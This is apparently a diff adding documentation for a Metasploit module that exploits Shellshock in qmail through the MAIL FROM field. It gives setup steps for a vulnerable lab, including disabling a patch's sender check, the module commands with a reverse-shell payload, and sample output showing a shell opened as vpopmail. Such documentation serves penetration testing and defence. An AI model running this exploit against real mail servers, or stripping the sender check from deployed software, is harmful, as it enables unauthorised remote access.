|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually [email protected]). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed. |
| 4 | + |
| 5 | +## Setting up a vulnerable environment |
| 6 | + |
| 7 | +Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd. |
| 8 | + |
| 9 | +## Verification Steps |
| 10 | + |
| 11 | + 1. `use exploit/unix/smtp/qmail_bash_env_exec` |
| 12 | + 2. `set RHOST <target IP>` |
| 13 | + 3. `set MAILTO <valid e-mail recipient>` |
| 14 | + 4. `set payload cmd/unix/reverse` |
| 15 | + 5. `set LHOST <local IP>` |
| 16 | + 7. optionally set `RPORT` and `LPORT` |
| 17 | + 8. `exploit` |
| 18 | + 9. **Verify** a new shell session is started |
| 19 | + |
| 20 | +## Options |
| 21 | + |
| 22 | +**MAILTO** |
| 23 | + |
| 24 | +A valid e-mail recipient. Usually, [email protected] can be used. |
| 25 | + |
| 26 | +## Sample Output |
| 27 | +**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).** |
| 28 | + |
| 29 | +``` |
| 30 | +msf > use exploit/unix/smtp/qmail_bash_env_exec |
| 31 | +msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113 |
| 32 | +rhost => 192.168.1.113 |
| 33 | +msf exploit(qmail_bash_env_exec) > set mailto "[email protected]" |
| 34 | + |
| 35 | +msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse |
| 36 | +payload => cmd/unix/reverse |
| 37 | +msf exploit(qmail_bash_env_exec) > show options |
| 38 | +
|
| 39 | +Module options (exploit/unix/smtp/qmail_bash_env_exec): |
| 40 | +
|
| 41 | + Name Current Setting Required Description |
| 42 | + ---- --------------- -------- ----------- |
| 43 | + MAILTO [email protected] yes TO address of the e-mail |
| 44 | + RHOST 192.168.1.113 yes The target address |
| 45 | + RPORT 25 yes The target port (TCP) |
| 46 | +
|
| 47 | +
|
| 48 | +Payload options (cmd/unix/reverse): |
| 49 | +
|
| 50 | + Name Current Setting Required Description |
| 51 | + ---- --------------- -------- ----------- |
| 52 | + LHOST 192.168.1.102 yes The listen address |
| 53 | + LPORT 4444 yes The listen port |
| 54 | +
|
| 55 | +
|
| 56 | +Exploit target: |
| 57 | +
|
| 58 | + Id Name |
| 59 | + -- ---- |
| 60 | + 0 Automatic |
| 61 | +
|
| 62 | +
|
| 63 | +msf exploit(qmail_bash_env_exec) > run |
| 64 | +
|
| 65 | +[*] Started reverse TCP double handler on 192.168.1.102:4444 |
| 66 | +[*] 192.168.1.113:25 - Sending the payload... |
| 67 | +[*] 192.168.1.113:25 - Sending RCPT TO [email protected] |
| 68 | +[*] Accepted the first client connection... |
| 69 | +[*] Accepted the second client connection... |
| 70 | +[*] Command: echo RvZfov9i2ZuveLXA; |
| 71 | +[*] Writing to socket A |
| 72 | +[*] Writing to socket B |
| 73 | +[*] Reading from sockets... |
| 74 | +[*] Reading from socket B |
| 75 | +[*] B: "RvZfov9i2ZuveLXA\r\n" |
| 76 | +[*] Matching... |
| 77 | +[*] A is input... |
| 78 | +[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200 |
| 79 | +
|
| 80 | +whoami |
| 81 | +vpopmail |
| 82 | +``` |
0 commit comments